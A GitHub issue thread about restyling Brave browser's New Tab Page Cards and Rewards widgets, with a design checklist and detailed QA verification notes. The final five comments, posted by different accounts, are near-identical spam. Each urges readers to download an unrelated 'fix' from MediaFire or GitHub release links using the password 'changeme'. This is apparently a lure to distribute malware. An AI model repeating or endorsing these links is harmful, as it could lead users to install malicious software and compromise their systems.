### ISSUE TITLE
Update the styling of the Cards and Rewards card widget

### ISSUE THREAD

**Issue by rebron** [brave/brave-browser#38752]
### Description

We updated the design of several elements in the NTP to match the ghost effect design of Brave News and the Search Widget. Here's a detail of the changes for the cards and Rewards card widget:

https://www.figma.com/file/QCBklDojDtDTKApz10XqSQ/%F0%9F%97%82-New-Tab-Page?type=design&node-id=1%3A648&mode=design&t=MkeWs0VdCwTbTGPd-1

### Steps to reproduce

n/a

### Actual result

<img width="311" alt="Screenshot 2024-05-31 at 3 50 49 PM" src="https://github.com/brave/brave-browser/assets/5951041/55a56484-adaa-4a62-96ef-c4ac7e5be78b">

### Expected result
![image](https://github.com/brave/brave-browser/assets/11497541/8c053b5b-706e-459c-b2f2-9ee6407087aa)

### Widget cards
- [ ] Front card uses background of glass/70 (Color is universal, doesn't change between light/dark mode)
- [ ] Front card has a stroke gradient (Color is universal, doesn't change between light/dark mode)
- [ ] Background card has a glass/50 background  (Color is universal, doesn't change between light/dark mode)
- [ ] Edit cards button uses background of glass/70  (Color is universal, doesn't change between light/dark mode)
- [ ] Each card and edit card button has background blur
- [ ] Remove "Edit cards" at the bottom of the widgets
- [ ] Feature names (talk, rewards) are all lowercase and drop the "Brave ..."

### Rewards widget card
- [ ] Change CTA to "Learn more" and that links to the onboarding
- [ ] Remove the "How does it work" button
- [ ] Remove privacy agreement

### Reproduces how often

Easily reproduced

### Brave version (brave://version info)

1.68.x

### Channel information

- [ ] release (stable)
- [ ] beta
- [X] nightly

### Reproducibility

- [ ] with Brave Shields disabled
- [ ] with Brave Rewards disabled
- [ ] in the latest version of Chrome

### Miscellaneous information

Related issues:
https://github.com/brave/brave-browser/issues/37213
https://github.com/brave/brave-browser/issues/38183

**Comment by Miyayes** [comment]
Noting that the Figma needs to be updated, since the contents of the rewards widget are now different.

Current design:
![image](https://github.com/brave/brave-browser/assets/11497541/a0200d28-52f6-428a-88c8-bff3e4d3b9d6)

**Comment by kjozwiak** [comment]
Removing the `feature/web3/wallet` as the above looks like a `Rewards` UI/UX fix/improvement. Seems like the `brave-builds` bot labelled the above incorrectly. @rebron please correct me if we should re-add the `wallet` label.

**Comment by kjozwiak** [comment]
The above requires `1.68.103` or higher for `1.68.x` verification 👍

**Comment by LaurenWags** [comment]
Verification in progress with

```
Brave | 1.68.105 Chromium: 126.0.6478.126 (Official Build) beta (x86_64)
-- | --
Revision | 0f19763468e437ae45d4603935bce4bb0a941333
OS | macOS Version 13.6.7 (Build 22G720)
```

**Comment by LaurenWags** [comment]
Verification in progress with

```
Brave	1.68.106 Chromium: 126.0.6478.126 (Official Build) beta (64-bit) 
Revision	8d682ca0cb836cac019e09be7744d3852e68953e
OS	Linux
```

**Comment by MadhaviSeelam** [comment]
Verification `In progress` using
```
Brave | 1.68.106 Chromium: 126.0.6478.126 (Official Build) beta (64-bit)
-- | --
Revision | 8d682ca0cb836cac019e09be7744d3852e68953e
OS | Windows 11 Version 23H2 (Build 22631.3810)
```

<details>
<summary>Talk - PASSED</summary>

- Confirmed the Talk widget matches screenshot from https://github.com/brave/brave-core/pull/24211#issue-2353694498
- Confirmed no "Edit Cards" option displayed below the cards
- Confirmed option from the 3 dots menu on the Talk card worked as expected:
    - Hide Talk --> hid the Talk card from NTP
- Confirmed card selection is "sticky" (Talk card is "on top") on new tabs if it was selected. It remains "on top" on subsequent relaunches of the browser unless Rewards card is selected.

1.67.x | 1.68.x
--- | ---
![image](https://github.com/brave/brave-browser/assets/98358127/644b5c12-23a6-4ec6-99c9-bca13a1279fa)|![image](https://github.com/brave/brave-browser/assets/98358127/3182d2cd-1a4f-4629-b2a6-fe519f51d62c)
![image](https://github.com/brave/brave-browser/assets/98358127/0fe7edb4-a50d-46f8-a728-ec2bee1fcc91)|![image](https://github.com/brave/brave-browser/assets/98358127/4c8e3a40-4b4a-44c9-9718-c8fdaf2797bb)

**_Hide talk cards via NTP cards_**
  - Confirmed able to hide talk card via 3 dots menu 
    
1.67.x | 1.68.x
--- | ---
![image](https://github.com/brave/brave-browser/assets/98358127/3e012577-e6ab-457c-aa0f-700e9976ee37)|![image](https://github.com/brave/brave-browser/assets/98358127/a77f8b0f-1c4d-4f9a-aad3-789a1a4bdb87)
![image](https://github.com/brave/brave-browser/assets/98358127/3e145be5-d5fa-4079-8ad2-1a363ab1e06e)|![image](https://github.com/brave/brave-browser/assets/98358127/036615a3-0b37-4beb-b5c3-3df633d2de9c)

**_Hide and Unhide Talk card via Cards in the Customize Dashboard_**

1. continued from above case `**_Hide talk cards via NTP cards_**`
2. clicked `Add` button in the Dashboard
3. clicked `Hide` button

- Confirmed able to unhide Talk card via "Cards" under "Customize Dashboard"
- Confirmed able to hide Talk card via "Cards" under "Customize Dashboard"

example | example | example
----- | ------ | ------
![image](https://github.com/brave/brave-browser/assets/98358127/bcad0b77-f64e-4854-a236-79afdeb02e7f)|![image](https://github.com/brave/brave-browser/assets/98358127/98bf61db-a9cc-4938-b39a-ee0523a4de36)|![image](https://github.com/brave/brave-browser/assets/98358127/cc2b11ce-2e77-49d3-bd88-1e9ae6d0fcca)

**_About your data_** & **_Start call_**

- Confirmed clicking on the "Start call" button on the card opened a new Brave Talk meeting in the tab
- Confirmed clicking on "About your data" opened https://brave.com/privacy/browser/#brave-talk-learn in a new tab

example | example 
----- | ----
![image](https://github.com/brave/brave-browser/assets/98358127/5e514d7c-d5b5-47de-afbe-03ffdb03971d)|![image](https://github.com/brave/brave-browser/assets/98358127/e002a9d1-f741-4512-9400-4c3f3b440a6d)

**_Hide clock & Hide Rewards_**

example | example | example
----- | ---- | -----
![image](https://github.com/brave/brave-browser/assets/98358127/e7daabd7-93e1-4b8b-a2e2-88f365d3af09)|![image](https://github.com/brave/brave-browser/assets/98358127/a4b686a4-d782-4d8b-b9ff-8cbf2d506f67)|![image](https://github.com/brave/brave-browser/assets/98358127/c32c9afa-a1fb-4f75-b669-57e5f4f9590a)

**_Dark theme_**

example | example | example | example 
------ | ----- | ----- | -----
![image](https://github.com/brave/brave-browser/assets/98358127/6cb6a56e-e8c7-4646-9163-87efe4337ca1)|![image](https://github.com/brave/brave-browser/assets/98358127/ccb417d1-5c9d-4730-a461-d48ca071b0fa)|![image](https://github.com/brave/brave-browser/assets/98358127/af3269cb-6049-4551-af24-c663fd82a286)|![image](https://github.com/brave/brave-browser/assets/98358127/a2538d1b-fabb-4648-8397-245e63216eda)
</details>

<details>
<summary>Rewards - Overall PASSED, see individual cases for additional notes and follow ups</summary>

<details>
<summary>Not opted into Rewards - PASSED</summary>

- Confirmed on a new profile when not opted into Rewards, the Rewards widget matches screenshot from https://github.com/brave/brave-core/pull/24211#issue-2353694498
- Confirmed no "Edit Cards" option displayed below the cards
- Confirmed each option from the 3 dots menu on the Rewards card worked as expected:
   - Open Rewards Panel --> opened panel in URL bar
   - Rewards settings --> opened brave://rewards
   - Learn more --> opened `https://brave.com/brave-rewards/` in a new tab
   - Hide Brave Rewards --> hid the Rewards card from NTP
- Confirmed card selection is "sticky" (Rewards card is "on top" by default) on new tabs if it was selected. It remains "on top" on subsequent relaunches of the browser unless Talk card is selected.

1.67.x | 1.68.x
--- | ---
![image](https://github.com/brave/brave-browser/assets/98358127/ff980157-a1c8-42fb-944e-3e34e4c2f806)|![image](https://github.com/brave/brave-browser/assets/98358127/310f0df2-c21b-4405-9090-1cb5d542b6ad)
![image](https://github.com/brave/brave-browser/assets/98358127/89a12698-fd19-4822-8656-fd42892fdefd)|![image](https://github.com/brave/brave-browser/assets/98358127/5df68f62-48f1-459c-b365-609c0ce9bc5e)

- Confirmed clicking on the "Learn more" button on the card opened the panel:

![image](https://github.com/brave/brave-browser/assets/98358127/d594521d-5a12-4680-99f6-b4f1e659b8e7)

- Confirmed able to hide Rewards card via 3 dots menu
- Confirmed able to unhide Rewards card via "Cards" under "Customize Dashboard"
- Confirmed able to hide Rewards card via "Cards" under "Customize Dashboard"

Example | Example | Example 
--- | --- | -----
![image](https://github.com/brave/brave-browser/assets/98358127/3e86d330-5310-41cf-af7e-59b89f4f29bf)|![image](https://github.com/brave/brave-browser/assets/98358127/a0870e79-9361-4c67-a83a-15d0666ce464)|![image](https://github.com/brave/brave-browser/assets/98358127/d419564a-b7b5-4489-a8d0-480adf07ea9f)


</details>

<details>
<summary>Opted into Rewards - Unconnected state - Pending</summary>

- Confirmed on a new profile when opted into Rewards, but no custodian connected, the Rewards widget matches screenshot from https://github.com/brave/brave-core/pull/24211#issue-2353694498

1.67.x | 1.68.x
--- | ---
![image](https://github.com/brave/brave-browser/assets/98358127/511494a3-6fab-4e82-842f-bcb7f5e98e01)
![image](https://github.com/brave/brave-browser/assets/98358127/472b4139-d1c7-4c27-a9bc-1bc51e75fd9a)

- Confirmed visiting verified creators increases the count on the Rewards card as expected:

![image](https://github.com/brave/brave-browser/assets/98358127/3f25a892-c053-4230-b63d-e6e5921df81a)

- Confirmed clicking on the "Connect account" button on the card opened brave://rewards/#verify in a new tab:

![image](https://github.com/brave/brave-browser/assets/98358127/9925014b-0116-4a49-a019-ef3079a2f7d7)

Dark theme
![image](https://github.com/brave/brave-browser/assets/98358127/fc216a54-b0bf-42e8-8513-806c13e7a66d)
![image](https://github.com/brave/brave-browser/assets/98358127/96b4caee-874b-4e45-bd96-670291d01bda)

</details>

<details>
<summary>Opted into Rewards - Connected state - Pending</summary>

- Confirmed on a new profile when opted into Rewards with a custodian connected, the Rewards widget matches screenshot from https://github.com/brave/brave-core/pull/24211#issue-2353694498

1.67.x | 1.68.x
--- | ---


- Confirmed the balances displayed as expected on the widget (balances on widget matched panel and brave://rewards page)
- Confirmed tooltip text on the widget
- Confirmed clicking on "Manage ads" on widget tooltip opened brave://rewards page

Example | Example | Example | Example
--- | --- | --- | ---


- Confirmed the various payout banners (pending, processing, completed, none) displayed on the widget as expected
- For the "Processing" status banner, confirmed "Check status" link directs to `https://brave.com/payout-status` which redirects to community specific page regarding payout status for the particular payout
- For the "Complete" status banner, confirmed "Support" link directs to `https://community.brave.com/`

Pending | Processing | Complete | None
--- | --- | --- | ---


Note, here's the display of these banners in 1.67.x for comparison

<details>

Pending | Processing | Complete | None
--- | --- | --- | ---


</details>

Below are some pointers on getting these banners to display if you're not familiar with them:

<details>

Pre-reqs for all banners: 
- Be connected to a custodian, then proceed to below
- Have ad tokens "cashed in"/redeemed with the server for the current month (in this case, June)

For "Pending":
- Before launching browser to check, advance computer clock date to between 1st and 7th of next month (in this case, July)
- Also have a Charles Proxy rule configured so that the `parameters` endpoint doesn't return a status for the custodian or returns "off". See what is returned for `Uphold` in below response as examples:
   - `{"autocontribute":{"choices":[1,2,3,5,7,10,20],"defaultChoice":1},"batRate":0.196277,"custodianRegions":{"bitflyer":{"allow":["JP"],"block":[]},"gemini":{"allow":["US","SG","GB","CA"],"block":[]},"solana":{"allow":[],"block":["KP","ES"]},"uphold":{"allow":["AD","AU","AR","AT","BE","BR","BS","BZ","CA","CH","CL","CO","CR","CY","CZ","DK","EC","EE","FI","FR","GD","GT","GR","HK","HN","HU","IE","IS","IT","JM","KY","LI","LT","LV","LU","MC","MT","MX","NI","NO","NZ","PE","PT","PY","SG","TR","UY","ES","SE","GB","US","UM","ZA","PL","SK","HR","SI","GR","TW"],"block":[]},"zebpay":{"allow":["IN"],"block":[]}},"payoutStatus":{"bitflyer":"processing","gemini":"processing","payoutDate":"","solana":"processing","unverified":"processing","uphold":"off","zebpay":""},"tips":{"defaultMonthlyChoices":[1.25,5,10.5],"defaultTipChoices":[1.25,5,10.5]},"tosVersion":1,"vbatDeadline":"2023-10-31T00:00:00Z","vbatExpired":true}`
   - `{"autocontribute":{"choices":[1,2,3,5,7,10,20],"defaultChoice":1},"batRate":0.196277,"custodianRegions":{"bitflyer":{"allow":["JP"],"block":[]},"gemini":{"allow":["US","SG","GB","CA"],"block":[]},"solana":{"allow":[],"block":["KP","ES"]},"uphold":{"allow":["AD","AU","AR","AT","BE","BR","BS","BZ","CA","CH","CL","CO","CR","CY","CZ","DK","EC","EE","FI","FR","GD","GT","GR","HK","HN","HU","IE","IS","IT","JM","KY","LI","LT","LV","LU","MC","MT","MX","NI","NO","NZ","PE","PT","PY","SG","TR","UY","ES","SE","GB","US","UM","ZA","PL","SK","HR","SI","GR","TW"],"block":[]},"zebpay":{"allow":["IN"],"block":[]}},"payoutStatus":{"bitflyer":"processing","gemini":"processing","payoutDate":"","solana":"processing","unverified":"processing","uphold":"","zebpay":""},"tips":{"defaultMonthlyChoices":[1.25,5,10.5],"defaultTipChoices":[1.25,5,10.5]},"tosVersion":1,"vbatDeadline":"2023-10-31T00:00:00Z","vbatExpired":true}`

For "Processing":
- Before launching browser to check, advance computer clock date to between 7th and end of next month (in this case, July)
- Also have a Charles Proxy rule configured so that the `parameters` endpoint returns "processing". See what is returned for `Uphold` in below response as an example:
   - `{"autocontribute":{"choices":[1,2,3,5,7,10,20],"defaultChoice":1},"batRate":0.196277,"custodianRegions":{"bitflyer":{"allow":["JP"],"block":[]},"gemini":{"allow":["US","SG","GB","CA"],"block":[]},"solana":{"allow":[],"block":["KP","ES"]},"uphold":{"allow":["AD","AU","AR","AT","BE","BR","BS","BZ","CA","CH","CL","CO","CR","CY","CZ","DK","EC","EE","FI","FR","GD","GT","GR","HK","HN","HU","IE","IS","IT","JM","KY","LI","LT","LV","LU","MC","MT","MX","NI","NO","NZ","PE","PT","PY","SG","TR","UY","ES","SE","GB","US","UM","ZA","PL","SK","HR","SI","GR","TW"],"block":[]},"zebpay":{"allow":["IN"],"block":[]}},"payoutStatus":{"bitflyer":"processing","gemini":"processing","payoutDate":"","solana":"processing","unverified":"processing","uphold":"processing","zebpay":""},"tips":{"defaultMonthlyChoices":[1.25,5,10.5],"defaultTipChoices":[1.25,5,10.5]},"tosVersion":1,"vbatDeadline":"2023-10-31T00:00:00Z","vbatExpired":true}`

For "Complete":
- Before launching browser to check, advance computer clock date to between 7th and end of next month (in this case, July)
- Also have a Charles Proxy rule configured so that the `parameters` endpoint returns "complete". See what is returned for `Uphold` in below response as an example:
   - `{"autocontribute":{"choices":[1,2,3,5,7,10,20],"defaultChoice":1},"batRate":0.196277,"custodianRegions":{"bitflyer":{"allow":["JP"],"block":[]},"gemini":{"allow":["US","SG","GB","CA"],"block":[]},"solana":{"allow":[],"block":["KP","ES"]},"uphold":{"allow":["AD","AU","AR","AT","BE","BR","BS","BZ","CA","CH","CL","CO","CR","CY","CZ","DK","EC","EE","FI","FR","GD","GT","GR","HK","HN","HU","IE","IS","IT","JM","KY","LI","LT","LV","LU","MC","MT","MX","NI","NO","NZ","PE","PT","PY","SG","TR","UY","ES","SE","GB","US","UM","ZA","PL","SK","HR","SI","GR","TW"],"block":[]},"zebpay":{"allow":["IN"],"block":[]}},"payoutStatus":{"bitflyer":"processing","gemini":"processing","payoutDate":"","solana":"processing","unverified":"processing","uphold":"complete","zebpay":""},"tips":{"defaultMonthlyChoices":[1.25,5,10.5],"defaultTipChoices":[1.25,5,10.5]},"tosVersion":1,"vbatDeadline":"2023-10-31T00:00:00Z","vbatExpired":true}`

For "Off":
- Before launching browser to check, advance computer clock date to between 7th and end of next month (in this case, July)
- Also have a Charles Proxy rule configured so that the `parameters` endpoint returns "off". See what is returned for `Uphold` in below response as an example:
   - `{"autocontribute":{"choices":[1,2,3,5,7,10,20],"defaultChoice":1},"batRate":0.196277,"custodianRegions":{"bitflyer":{"allow":["JP"],"block":[]},"gemini":{"allow":["US","SG","GB","CA"],"block":[]},"solana":{"allow":[],"block":["KP","ES"]},"uphold":{"allow":["AD","AU","AR","AT","BE","BR","BS","BZ","CA","CH","CL","CO","CR","CY","CZ","DK","EC","EE","FI","FR","GD","GT","GR","HK","HN","HU","IE","IS","IT","JM","KY","LI","LT","LV","LU","MC","MT","MX","NI","NO","NZ","PE","PT","PY","SG","TR","UY","ES","SE","GB","US","UM","ZA","PL","SK","HR","SI","GR","TW"],"block":[]},"zebpay":{"allow":["IN"],"block":[]}},"payoutStatus":{"bitflyer":"processing","gemini":"processing","payoutDate":"","solana":"processing","unverified":"processing","uphold":"off","zebpay":""},"tips":{"defaultMonthlyChoices":[1.25,5,10.5],"defaultTipChoices":[1.25,5,10.5]},"tosVersion":1,"vbatDeadline":"2023-10-31T00:00:00Z","vbatExpired":true}`

</details>

</details>

<details>
<summary>Opted into Rewards - Disconnected state - Pending</summary>

- Compared disconnected state in 1.68.x to 1.67.x
- Confirmed widget prompted to re-connect to custodian
- Confirmed clicking on the prompt navigated me to custodian site for re-authorization

1.67.x | 1.68.x
--- | ---


</details>

<details>
<summary>Opted into Rewards - Custodian spot check - Pending</summary>

- Confirmed each custodial option displayed balance on the widget as expected

Uphold | Gemini | ZebPay | bitFlyer | Self-Custody
--- | --- | --- | --- | ---

</details>

<details>
<summary>Terms of Service notification on widget - Pending with follow up issue</summary>

- Confirmed "Terms of Service update" notification displayed on widget as expected for unconnected, connected, and disconnected rewards custodial states
- Encountered https://github.com/brave/brave-browser/issues/39386.

Unconnected | Connected | Disconnected
--- | --- | ---

</details>

<details>
<summary>Self Custody notification on widget - PASSED with follow up issue</summary>

- Confirmed "Self Custody" notification displayed on widget as expected 
- Confirmed "Connect account" button directs user to brave://rewards/#verify
- Confirmed "Not now" closes the notification
- Encountered https://github.com/brave/brave-browser/issues/39393

1.67.x | 1.68.x
--- | ---

</details>

</details>

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
